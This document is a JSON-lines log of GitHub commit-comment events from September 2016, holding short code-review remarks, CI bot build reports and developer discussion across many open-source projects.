{"id":"4593359633","type":"CommitCommentEvent","actor":{"login":"halter73"},"repo":{"name":"SignalR/SignalR"},"payload":{"comment":{"id":19106501,"position":null,"line":null,"path":null,"commit_id":"6ce631433b57505b0b3f1fe24f68f0681fca5aef","created_at":"2016-09-21T00:35:07Z","updated_at":"2016-09-21T00:35:07Z","body":"@jackwoodward \r\n\r\nYou could reenable keepalive checks by deriving from LongPollingTransport in your .net client code and overriding the SupportsKeepAlive property to return true. You will probably have to build your own AutoTransport with your custom LongPollingTransport if you want auto fallback.\r\n\r\nKeep in mind, that the reason we went *back* to setting SupportsKeepAlive to false is mainly due to proxies that might be between the server and the client. We found one of the most common reasons that clients had to fallback to the long polling transports is due to proxies buffering the entirety of HTTP responses. This meant that in practice that any time the long polling transport was selected due to this buffering, the client would quickly go into a reconnect loop because keep alive timeouts since the keep alives would be buffered and never make it to the client until an actual message was sent."}},"created_at":"2016-09-21T00:35:07Z"}
{"id":"4593360732","type":"CommitCommentEvent","actor":{"login":"jason200453"},"repo":{"name":"jason200453/bank"},"payload":{"comment":{"id":19106504,"position":null,"line":null,"path":null,"commit_id":"0b24b5bc5fcf03fd72c3fe5e27a1ffe771890a4d","created_at":"2016-09-21T00:35:29Z","updated_at":"2016-09-21T00:35:29Z","body":"好我試看看\r\n"}},"created_at":"2016-09-21T00:35:29Z"}
{"id":"4593361771","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106508,"position":24,"line":24,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"22ee0a4f764dee34b431156e2cdbac1ded4cbb9d","created_at":"2016-09-21T00:35:50Z","updated_at":"2016-09-21T00:35:50Z","body":"This gets duplicated a ton. Pull it into a helper method."}},"created_at":"2016-09-21T00:35:50Z"}
{"id":"4593361901","type":"CommitCommentEvent","actor":{"login":"nathanielmanistaatgoogle"},"repo":{"name":"cython/cython"},"payload":{"comment":{"id":19106509,"position":4,"line":4,"path":"Tools/rules.bzl","commit_id":"a62e4935914d0b4e0d438ef7bce89db88ff40c9d","created_at":"2016-09-21T00:35:51Z","updated_at":"2016-09-21T00:35:51Z","body":"Typo \"compile a .pyx files\"? Or is that a singular noun that ends with an ess?"}},"created_at":"2016-09-21T00:35:51Z"}
{"id":"4593362123","type":"CommitCommentEvent","actor":{"login":"gidili"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19106511,"position":31,"line":185,"path":"src/main/webapp/js/components/ComponentsInitialization_OSB.js","commit_id":"fced96a82a343de07bb7d6bc5d8d48bb14e50e34","created_at":"2016-09-21T00:35:58Z","updated_at":"2016-09-21T00:35:58Z","body":"@jrmartin ah! gotcha :)"}},"created_at":"2016-09-21T00:35:58Z"}
{"id":"4593362342","type":"CommitCommentEvent","actor":{"login":"JUSTaMod"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19106514,"position":null,"line":null,"path":null,"commit_id":"9c13370ec33dad0e4f096447dbc5fd597f06d75a","created_at":"2016-09-21T00:36:03Z","updated_at":"2016-09-21T00:36:03Z","body":"thats a really fantastic time to bring it up. AFTER they switch over to Pm's. :/"}},"created_at":"2016-09-21T00:36:03Z"}
{"id":"4593362518","type":"CommitCommentEvent","actor":{"login":"cdaringe"},"repo":{"name":"MRN-Code/coinstac"},"payload":{"comment":{"id":19106515,"position":null,"line":null,"path":null,"commit_id":"5313f562f33dc83290a7d3210efb8be5e597ce54","created_at":"2016-09-21T00:36:07Z","updated_at":"2016-09-21T00:36:07Z","body":"Remove clarity === reduce confusion ? ;)"}},"created_at":"2016-09-21T00:36:07Z"}
{"id":"4593362525","type":"CommitCommentEvent","actor":{"login":"NigoroJr"},"repo":{"name":"NigoroJr/color_coded-colorschemes"},"payload":{"comment":{"id":19106517,"position":null,"line":null,"path":null,"commit_id":"7030593e9e85e0f3106edf33d5070d15b5c2e52f","created_at":"2016-09-21T00:36:07Z","updated_at":"2016-09-21T00:36:07Z","body":"@jeaye Thanks! And thanks for your wonderful plugin! 😄 "}},"created_at":"2016-09-21T00:36:07Z"}
{"id":"4593363414","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19106524,"position":212,"line":376,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T00:36:24Z","updated_at":"2016-09-21T00:36:24Z","body":"I see your point though. Here we are blindly counting the set bits, instead making sure that they are the first n contiguous bits that are set."}},"created_at":"2016-09-21T00:36:24Z"}
{"id":"4593365828","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19106533,"position":null,"line":null,"path":null,"commit_id":"a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5","created_at":"2016-09-21T00:37:13Z","updated_at":"2016-09-21T00:37:13Z","body":"About time I tested this.  What's your pin mapping?\r\n\r\nWhat are you using?  After rooting around in parts bin, I've a [microSD shield](https://www.sparkfun.com/products/retired/9802) which will expose `CS`, `DI`, `DO`, and `CLK`, with the outputs unnecessarily buffered by a 74HC4050.  It should do me for bench testing.\r\n\r\nLonger term, I'll look at the [Feather Huzzah](https://www.adafruit.com/product/2821) as there's a handy [microSD daughter board](https://www.adafruit.com/products/2922)."}},"created_at":"2016-09-21T00:37:13Z"}
{"id":"4593366040","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19106536,"position":null,"line":null,"path":null,"commit_id":"6d2abb007c603172f936bfda6813ad217d7e3546","created_at":"2016-09-21T00:37:17Z","updated_at":"2016-09-21T00:37:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#d0wdk3wrRjmoFCJbYPnpwg"}},"created_at":"2016-09-21T00:37:17Z"}
{"id":"4593368175","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19106539,"position":null,"line":null,"path":null,"commit_id":"9c4d0904f1e84b11d8d14f79efe76ec2ff7154a7","created_at":"2016-09-21T00:38:01Z","updated_at":"2016-09-21T00:38:01Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JKi9VKPVQ9SSfEfGYVxVhw"}},"created_at":"2016-09-21T00:38:01Z"}
{"id":"4593371274","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106547,"position":163,"line":157,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"22ee0a4f764dee34b431156e2cdbac1ded4cbb9d","created_at":"2016-09-21T00:39:06Z","updated_at":"2016-09-21T00:39:06Z","body":"always use {} for if/else."}},"created_at":"2016-09-21T00:39:06Z"}
{"id":"4593371934","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106551,"position":196,"line":179,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"22ee0a4f764dee34b431156e2cdbac1ded4cbb9d","created_at":"2016-09-21T00:39:19Z","updated_at":"2016-09-21T00:39:19Z","body":"Indentation."}},"created_at":"2016-09-21T00:39:19Z"}
{"id":"4593372370","type":"CommitCommentEvent","actor":{"login":"ecaramba"},"repo":{"name":"ecaramba/PHPOO"},"payload":{"comment":{"id":19106553,"position":17,"line":12,"path":"Carro.php","commit_id":"c06aeaa616bd019ead9ec9d01dd8b1e542b642d7","created_at":"2016-09-21T00:39:26Z","updated_at":"2016-09-21T00:39:26Z","body":"Pra que isso?"}},"created_at":"2016-09-21T00:39:26Z"}
{"id":"4593373989","type":"CommitCommentEvent","actor":{"login":"himanshu0202"},"repo":{"name":"himanshu0202/AudioServer-and-PlayerClient"},"payload":{"comment":{"id":19106557,"position":null,"line":null,"path":null,"commit_id":"ac49762a4cf0845ca9fb481fa59e36dca0583438","created_at":"2016-09-21T00:39:59Z","updated_at":"2016-09-21T00:39:59Z","body":"![output_fkn9ln](https://cloud.githubusercontent.com/assets/15862560/18693769/013fd4dc-7f6a-11e6-8fb5-2b1d5211fed4.gif)\r\n"}},"created_at":"2016-09-21T00:39:59Z"}
{"id":"4593374463","type":"CommitCommentEvent","actor":{"login":"ReadyPlayerOne1"},"repo":{"name":"Wurst-Imperium/Wurst-Client-for-MC-1.10.X"},"payload":{"comment":{"id":19106559,"position":null,"line":null,"path":null,"commit_id":"6dd7f3461dfc9fb93bca7533a69096c028ddac5a","created_at":"2016-09-21T00:40:10Z","updated_at":"2016-09-21T00:40:10Z","body":"Can you add a way to have the Coordinates on screen like the top left or something like that I play a lot of 2b2t and coordinates would be great thanks "}},"created_at":"2016-09-21T00:40:10Z"}
{"id":"4593376932","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19106566,"position":null,"line":null,"path":null,"commit_id":"b6dd8bd0b6d6b320790a6bb5caff96ee874c1844","created_at":"2016-09-21T00:40:57Z","updated_at":"2016-09-21T00:40:57Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/515/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-21T00:40:57Z"}
{"id":"4593377452","type":"CommitCommentEvent","actor":{"login":"bluegr"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19106568,"position":18,"line":184,"path":"engines/fullpipe/stateloader.cpp","commit_id":"cf4452388cc4104072801b2a0c74bdef03d419d5","created_at":"2016-09-21T00:41:08Z","updated_at":"2016-09-21T00:41:08Z","body":"in->seek(in->size() - 1, SEEK_SET) looks to be a bit more efficient, in this case"}},"created_at":"2016-09-21T00:41:08Z"}
{"id":"4593377606","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106570,"position":245,"line":216,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"22ee0a4f764dee34b431156e2cdbac1ded4cbb9d","created_at":"2016-09-21T00:41:11Z","updated_at":"2016-09-21T00:41:11Z","body":"Why not `performance--` here?"}},"created_at":"2016-09-21T00:41:11Z"}
{"id":"4593378333","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106572,"position":8,"line":65,"path":"Assignment_2_Vacuum_Cleaner/world/Environment.java","commit_id":"22ee0a4f764dee34b431156e2cdbac1ded4cbb9d","created_at":"2016-09-21T00:41:25Z","updated_at":"2016-09-21T00:41:25Z","body":"Remove the whitespace."}},"created_at":"2016-09-21T00:41:25Z"}
{"id":"4593379631","type":"CommitCommentEvent","actor":{"login":"himanshu0202"},"repo":{"name":"himanshu0202/Travel"},"payload":{"comment":{"id":19106573,"position":null,"line":null,"path":null,"commit_id":"97c617b27c6b28a746544dba19ced7e108e8e4f6","created_at":"2016-09-21T00:41:51Z","updated_at":"2016-09-21T00:41:51Z","body":"![output_xqv8hc](https://cloud.githubusercontent.com/assets/15862560/18693801/44485362-7f6a-11e6-82f2-9b57816556eb.gif)\r\n"}},"created_at":"2016-09-21T00:41:51Z"}
{"id":"4593381172","type":"CommitCommentEvent","actor":{"login":"CCYD"},"repo":{"name":"CCYD/SkypeBot"},"payload":{"comment":{"id":19106577,"position":null,"line":null,"path":null,"commit_id":"3367e4d6392b5cd642f75845594115492567c097","created_at":"2016-09-21T00:42:20Z","updated_at":"2016-09-21T00:42:20Z","body":"function...method all the same shit "}},"created_at":"2016-09-21T00:42:20Z"}
{"id":"4593383035","type":"CommitCommentEvent","actor":{"login":"dabrahams"},"repo":{"name":"apple/swift-llvm"},"payload":{"comment":{"id":19106582,"position":null,"line":null,"path":null,"commit_id":"1defb1946ca377000d07436cb76595e1bce45c5d","created_at":"2016-09-21T00:43:00Z","updated_at":"2016-09-21T00:43:00Z","body":"This commit broke the public CI build: https://ci.swift.org/job/oss-swift-incremental-RA-osx/6394/consoleFull#248885494ee1a197b-acac-4b17-83cf-a53b95139a76"}},"created_at":"2016-09-21T00:43:00Z"}
{"id":"4593383139","type":"CommitCommentEvent","actor":{"login":"punkty"},"repo":{"name":"andycarver/valleymeadows"},"payload":{"comment":{"id":19106583,"position":null,"line":null,"path":null,"commit_id":"4586ff2a4a6bdaec74a4a4877df934388d7cf57b","created_at":"2016-09-21T00:43:02Z","updated_at":"2016-09-21T00:43:02Z","body":"Ben uploaded these changes. for some reason i had to commit ben's changes"}},"created_at":"2016-09-21T00:43:02Z"}
{"id":"4593392317","type":"CommitCommentEvent","actor":{"login":"skofgar"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19106604,"position":null,"line":null,"path":null,"commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T00:46:08Z","updated_at":"2016-09-21T00:46:08Z","body":"Hey @NatashaTheRobot \r\nI just noticed your updated version and started comparing it with mine https://github.com/naoty/Timepiece/pull/59 .\r\nI noticed some differences I am going to highlight in your code and will ask you for your input if you don't mind :)\r\n"}},"created_at":"2016-09-21T00:46:08Z"}
{"id":"4593395779","type":"CommitCommentEvent","actor":{"login":"planetceres"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19106610,"position":null,"line":null,"path":null,"commit_id":"b102ba4b758d69224a1ac99a7e93f0a0fa07f6b6","created_at":"2016-09-21T00:47:13Z","updated_at":"2016-09-21T00:47:13Z","body":"After this commit, script won't run, raising error:\r\n\r\n`AttributeError: 'GFile' object has no attribute 'size'`\r\n\r\nBefore change, no problems. \r\n\r\nCommit description also contradicts the change. Is \"size\" being renamed to \"Size\" or vice versa?\r\n"}},"created_at":"2016-09-21T00:47:13Z"}
{"id":"4593396163","type":"CommitCommentEvent","actor":{"login":"craig8"},"repo":{"name":"kmonson/volttron"},"payload":{"comment":{"id":19106614,"position":6,"line":7,"path":"examples/configurations/drivers/modbus1.config","commit_id":"cf0a5007f8758c0a0ff1a30e6bfbc620aa3e9b96","created_at":"2016-09-21T00:47:25Z","updated_at":"2016-09-21T00:47:25Z","body":"Ahh k I am to remind you to fix your path before you submit a pull request :) I can do that I suppose :)"}},"created_at":"2016-09-21T00:47:25Z"}
{"id":"4593396357","type":"CommitCommentEvent","actor":{"login":"skofgar"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19106615,"position":36,"line":34,"path":"Sources/NSCalendarUnit+Timepiece.swift","commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T00:47:29Z","updated_at":"2016-09-21T00:47:29Z","body":"I used `Calendar.Component`. I think that should be equivalent - no?\r\n\r\n```\r\nswitch self {\r\n        case Calendar.Component.nanosecond:     return 1e-9                 // 1e-9 second\r\n        case Calendar.Component.second:     \treturn 1                    // 1 second\r\n        case Calendar.Component.minute:         return 60                   // 1 minute\r\n        case Calendar.Component.hour:           return 3600                 // 1 hour\r\n        case Calendar.Component.weekday,\r\n             Calendar.Component.weekdayOrdinal,\r\n             Calendar.Component.day:            return 86400                // 1 day\r\n        case Calendar.Component.weekOfYear,\r\n             Calendar.Component.weekOfMonth:    return 604800               // 7 days\r\n        case Calendar.Component.month:          return 2592000              // 30 days\r\n        case Calendar.Component.yearForWeekOfYear,\r\n             Calendar.Component.quarter:        return 146097/400/4*86400   // ~91.31 days\r\n        case Calendar.Component.year:       \treturn 146097/400*86400     // ~365.25 days\r\n        // 400 years have 146097 days (taking into account leap year rules)\r\n```"}},"created_at":"2016-09-21T00:47:29Z"}
{"id":"4593397973","type":"CommitCommentEvent","actor":{"login":"paulfitz"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19106621,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-21T00:48:03Z","updated_at":"2016-09-21T00:48:03Z","body":"I think, but don't quote me on this, that this was for this one weird trick point grey cameras have/had for timestamps https://www.ptgrey.com/KB/10308:\r\n\r\n> Embedded image timestamp - This timestamp takes the 1394 cycle timer at the time that the shutter was closed and embeds the information in the image pixels. This is the most accurate of the timestamps.\r\n> To access this, set the appropriate bit of the FRAME_INFO register 12F8h or use flycaptureSetImageTimestamping() (FlyCapture v1.x), and then use a function to read the first 4 bytes of the image (the timestamp is located in the first 4 pixels of the image). For an example of how this is done in the FlyCapture interface, refer to the MultipleCameraEx sample program. For a FlyCapture 1.x example of how to manually parse the image data to retrieve this timestamp, download this sample program. Using FlyCapture2 you can enable the Embedded image timestamp using SetEmbeddedImageInfo (), and use GetMetaData() function to read the Embedded timestamp of the image.\r\n\r\nI'm pretty sure it isn't an autocomplete issue since I hadn't quite gotten around to setting that up in emacs at the time. I'm going to do it any day now.\r\n\r\nciao a tutti btw :-)"}},"created_at":"2016-09-21T00:48:03Z"}
{"id":"4593412102","type":"CommitCommentEvent","actor":{"login":"mohamedkhaled16"},"repo":{"name":"mohamedkhaled16/yiisample"},"payload":{"comment":{"id":19106647,"position":null,"line":null,"path":null,"commit_id":"9b644d6bce5e800f937cd5003791c036ab7591f8","created_at":"2016-09-21T00:52:44Z","updated_at":"2016-09-21T00:52:44Z","body":"first commit"}},"created_at":"2016-09-21T00:52:44Z"}
{"id":"4593413428","type":"CommitCommentEvent","actor":{"login":"skofgar"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19106649,"position":19,"line":15,"path":"Sources/NSCalendar+Timepiece.swift","commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T00:53:09Z","updated_at":"2016-09-21T00:53:09Z","body":"I almost have the same, but I ended up removing the `options`, which is breaking the API. Do you have any idea what the calendar-options were used for?\r\n\r\n```\r\nfunc dateByAdding(duration: Duration, to date: Date) -> Date? {\r\n        return self.date(byAdding: DateComponents(duration), to: date)\r\n    }\r\n```"}},"created_at":"2016-09-21T00:53:09Z"}
{"id":"4593420205","type":"CommitCommentEvent","actor":{"login":"rovinoo"},"repo":{"name":"rovinoo/Example"},"payload":{"comment":{"id":19106672,"position":4,"line":13,"path":"Hellogithub/Program.cs","commit_id":"3052b554bb015770c2a1c29c08a7102e2c5bf603","created_at":"2016-09-21T00:55:30Z","updated_at":"2016-09-21T00:55:30Z","body":"njhlnln"}},"created_at":"2016-09-21T00:55:30Z"}
{"id":"4593421228","type":"CommitCommentEvent","actor":{"login":"rcurtin"},"repo":{"name":"mlpack/mlpack"},"payload":{"comment":{"id":19106675,"position":null,"line":null,"path":null,"commit_id":"310e72d7afeb952bb08a0d0dabf16cc605178528","created_at":"2016-09-21T00:55:53Z","updated_at":"2016-09-21T00:55:53Z","body":"On second thought I have to agree.  I made these changes \"just to see if I could get it to work\" more than anything else, and thought to myself, \"I'll change it back once I bump the minimum version\".  But bumping the minimum version generally means checking the newest available version in Ubuntu old-LTS and current stable RHEL, which I didn't bother to do.  You've done the hard work for me, so I reverted the change in 045c16a and updated the minimum versions of the dependencies.  Thanks for keeping me honest. :)\r\n\r\nSorry about the RHEL package, I got busy and forgot.  I will try to do it soon but if I don't feel free to keep nudging..."}},"created_at":"2016-09-21T00:55:53Z"}
{"id":"4593422800","type":"CommitCommentEvent","actor":{"login":"robertwb"},"repo":{"name":"cython/cython"},"payload":{"comment":{"id":19106677,"position":4,"line":4,"path":"Tools/rules.bzl","commit_id":"a62e4935914d0b4e0d438ef7bce89db88ff40c9d","created_at":"2016-09-21T00:56:19Z","updated_at":"2016-09-21T00:56:19Z","body":"Oops, typo..."}},"created_at":"2016-09-21T00:56:19Z"}
{"id":"4593431380","type":"CommitCommentEvent","actor":{"login":"nsandovaal"},"repo":{"name":"nsandovaal/test"},"payload":{"comment":{"id":19106687,"position":null,"line":null,"path":null,"commit_id":"77f357d6939528dc3f4ae8f9506b20b393822062","created_at":"2016-09-21T00:59:12Z","updated_at":"2016-09-21T00:59:12Z","body":"hola"}},"created_at":"2016-09-21T00:59:12Z"}
{"id":"4593435574","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106696,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T01:00:34Z","updated_at":"2016-09-21T01:00:34Z","body":"ReplaceEPLaunchLite (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2373 of 2373 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T01:00:34Z"}
{"id":"4593437277","type":"CommitCommentEvent","actor":{"login":"aske"},"repo":{"name":"salty-horse/ibus-uniemoji"},"payload":{"comment":{"id":19106701,"position":null,"line":null,"path":null,"commit_id":"65ff978f47985c667eef2753a006eb827ea586bc","created_at":"2016-09-21T01:01:09Z","updated_at":"2016-09-21T01:01:09Z","body":"Everything works fine, though in here (https://github.com/salty-horse/ibus-uniemoji/blob/master/uniemoji.py#L132) it's better to make use of defined `SYSCONFDIR`.\r\n\r\nI've used `sed -i \"s,/etc/xdg/,$out/etc/xdg/,\" uniemoji.py` ($out is nixpkgs-specific)."}},"created_at":"2016-09-21T01:01:09Z"}
{"id":"4593438293","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19106704,"position":null,"line":null,"path":null,"commit_id":"9c13370ec33dad0e4f096447dbc5fd597f06d75a","created_at":"2016-09-21T01:01:29Z","updated_at":"2016-09-21T01:01:29Z","body":"Who cares about Nukkit's food system? Nukkit is just a Java clone of PocketMine."}},"created_at":"2016-09-21T01:01:29Z"}
{"id":"4593439901","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19106706,"position":null,"line":null,"path":null,"commit_id":"584f2f2ad11edb08755fbf2ab1e7a26375cb1d65","created_at":"2016-09-21T01:02:02Z","updated_at":"2016-09-21T01:02:02Z","body":"Also see [Issue 293](http://github.com/weidai11/cryptopp/issues/293)."}},"created_at":"2016-09-21T01:02:02Z"}
{"id":"4593446193","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106716,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T01:04:11Z","updated_at":"2016-09-21T01:04:11Z","body":"ReplaceEPLaunchLite (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T01:04:11Z"}
{"id":"4593452245","type":"CommitCommentEvent","actor":{"login":"milseman"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19106721,"position":120,"line":2051,"path":"lib/Sema/TypeCheckConstraintsApply.cpp","commit_id":"6804b235640914c0d88775bcf0edf0a2c42ad468","created_at":"2016-09-21T01:05:52Z","updated_at":"2016-09-21T01:05:52Z","body":"Don't leave me hanging @DougGregor! What are we recording?"}},"created_at":"2016-09-21T01:05:52Z"}
{"id":"4593452634","type":"CommitCommentEvent","actor":{"login":"yoda-kay"},"repo":{"name":"PocketPantry/pocketpantry.github.io"},"payload":{"comment":{"id":19106725,"position":5,"line":11,"path":"README.txt","commit_id":"e9b0adc8ac858c2a5907c37b5d51800d0660aeda","created_at":"2016-09-21T01:06:05Z","updated_at":"2016-09-21T01:06:05Z","body":"Omena Joshua Kayoda - 8095526"}},"created_at":"2016-09-21T01:06:05Z"}
{"id":"4593455010","type":"CommitCommentEvent","actor":{"login":"yoda-kay"},"repo":{"name":"PocketPantry/pocketpantry.github.io"},"payload":{"comment":{"id":19106730,"position":null,"line":null,"path":null,"commit_id":"e9b0adc8ac858c2a5907c37b5d51800d0660aeda","created_at":"2016-09-21T01:06:55Z","updated_at":"2016-09-21T01:06:55Z","body":"yo guys, how did you get the clone stuff"}},"created_at":"2016-09-21T01:06:55Z"}
{"id":"4593459124","type":"CommitCommentEvent","actor":{"login":"ucasFL"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19106737,"position":null,"line":null,"path":null,"commit_id":"a1d1b576e08ab6b42e01c9b6ca922dc9c4aefca8","created_at":"2016-09-21T01:08:21Z","updated_at":"2016-09-21T01:08:21Z","body":"\n\n\n�� 2016-09-21 07:24:17��\"Xingyu.Wang\" <notifications@github.com> ������\n\n>PUB:20160917 How to Install Latest XFCE Desktop in Ubuntu 16.04 and Fedora 22-24\n>\n>@ucasFL ��������������������������������\n>����������������������������������������������������������\n>-- \n>You are receiving this because you were mentioned.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/LCTT/TranslateProject/commit/a1d1b576e08ab6b42e01c9b6ca922dc9c4aefca8\n\n\n\n\n"}},"created_at":"2016-09-21T01:08:21Z"}
{"id":"4593465100","type":"CommitCommentEvent","actor":{"login":"wenyiyang"},"repo":{"name":"wenyiyang/Flickr-Browser"},"payload":{"comment":{"id":19106747,"position":null,"line":null,"path":null,"commit_id":"fe219a722e164b697b0dcc44dba7dfccff212bb5","created_at":"2016-09-21T01:10:26Z","updated_at":"2016-09-21T01:10:26Z","body":"JDK UPDATED"}},"created_at":"2016-09-21T01:10:26Z"}
{"id":"4593466772","type":"CommitCommentEvent","actor":{"login":"rserwin1"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19106752,"position":null,"line":null,"path":null,"commit_id":"380cf993781288164fe23a954552f4b03c2b9309","created_at":"2016-09-21T01:11:03Z","updated_at":"2016-09-21T01:11:03Z","body":"Please add execute permission for woof-CE/woof-code/rootfs-skeleton/etc/profile.d/java.sh.\r\n"}},"created_at":"2016-09-21T01:11:03Z"}
{"id":"4593478679","type":"CommitCommentEvent","actor":{"login":"AgentofGaming"},"repo":{"name":"benjamincharity/angular-keypad"},"payload":{"comment":{"id":19106781,"position":5,"line":40,"path":"src/keypad.controller.js","commit_id":"f50116dcb3516d00fc1311181c1fab5b771b8910","created_at":"2016-09-21T01:15:00Z","updated_at":"2016-09-21T01:15:00Z","body":"Is it necessary to specify the 0 since it is default for slice?"}},"created_at":"2016-09-21T01:15:00Z"}
{"id":"4593484576","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":19106787,"position":null,"line":null,"path":null,"commit_id":"06dfbbc1585e28e20dd203e75f17ef48ca9b547e","created_at":"2016-09-21T01:16:55Z","updated_at":"2016-09-21T01:16:55Z","body":"Thanks, I did not realize anyone would be using this fork on anything other than windows, I will fix it. "}},"created_at":"2016-09-21T01:16:55Z"}
{"id":"4593487732","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19106801,"position":null,"line":null,"path":null,"commit_id":"94710aab340a3918fd1e1b9ba475f19277ac67c0","created_at":"2016-09-21T01:17:59Z","updated_at":"2016-09-21T01:17:59Z","body":"Cool. Lets let it bake a little longer before flipping the switch to `true` though. I wonder if a bunch of people have the board sitting open... hopefully it doesn't cause a DOS on the Bugzilla server from all those reloads :)"}},"created_at":"2016-09-21T01:17:59Z"}
{"id":"4593490342","type":"CommitCommentEvent","actor":{"login":"aske"},"repo":{"name":"salty-horse/ibus-uniemoji"},"payload":{"comment":{"id":19106815,"position":null,"line":null,"path":null,"commit_id":"65ff978f47985c667eef2753a006eb827ea586bc","created_at":"2016-09-21T01:18:56Z","updated_at":"2016-09-21T01:18:56Z","body":"Ah, and `DATADIR` here: https://github.com/salty-horse/ibus-uniemoji/blob/master/uniemoji.xml.in#L20.\r\n\r\nAlso I'm having a great time with that quick emoji access, thanks for this project!"}},"created_at":"2016-09-21T01:18:56Z"}
{"id":"4593491242","type":"CommitCommentEvent","actor":{"login":"wokaol123"},"repo":{"name":"wokaol123/recipe-manager"},"payload":{"comment":{"id":19106816,"position":6,"line":6,"path":"recipe manager/classFile/PyMysql.py","commit_id":"c7752f7ed2bb206d373013eda4ef79976da14cbf","created_at":"2016-09-21T01:19:17Z","updated_at":"2016-09-21T01:19:17Z","body":"fdsfsad"}},"created_at":"2016-09-21T01:19:17Z"}
